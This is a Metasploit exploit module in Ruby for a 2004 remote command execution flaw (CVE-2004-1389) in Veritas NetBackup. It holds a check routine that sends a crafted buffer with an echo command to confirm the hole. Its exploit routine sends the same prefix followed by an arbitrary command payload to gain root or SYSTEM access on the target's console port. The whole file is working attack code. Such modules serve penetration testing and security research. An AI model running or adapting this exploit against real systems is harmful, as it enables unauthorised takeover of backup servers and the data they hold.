metasploit-gs/modules/exploits/multi/misc/veritas_netbackup_cmdexec.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'VERITAS NetBackup Remote Command Execution',
        'Description' => %q{
          This module allows arbitrary command execution on an
          ephemeral port opened by Veritas NetBackup, whilst an
          administrator is authenticated. The port is opened and
          allows direct console access as root or SYSTEM from
          any source address.
        },
        'Author' => [ 'aushack' ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2004-1389' ],
          [ 'OSVDB', '11026' ],
          [ 'BID', '11494' ]
        ],
        'Privileged' => true,
        'Platform' => %w{linux unix win},
        'Arch' => ARCH_CMD,
        'Payload' => {
          'Space' => 1024,
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' =>
                        {
                          'PayloadType' => 'cmd',
                          'RequiredCmd' => 'generic perl telnet',
                        }
        },
        'Targets' => [
          ['Automatic', {}],
        ],
        'DisclosureDate' => '2004-10-21',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  def check
    connect

    sploit = rand_text_alphanumeric(10)
    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\necho #{sploit}\n"

    sock.put(buf)
    banner = sock.get_once

    disconnect

    if banner.to_s.index(sploit)
      return Exploit::CheckCode::Vulnerable('Target executed the echo command successfully')
    end

    return Exploit::CheckCode::Safe('The target is not vulnerable')
  end

  def exploit
    connect

    sploit = payload.encoded.split(" ")

    buf = "\x20\x20\x201\x20\x20\x20\x20\x20\x201\n"
    buf << payload.encoded
    buf << "\n"

    sock.put(buf)
    res = sock.get_once

    print_status(res.to_s)

    handler
    disconnect
  end
end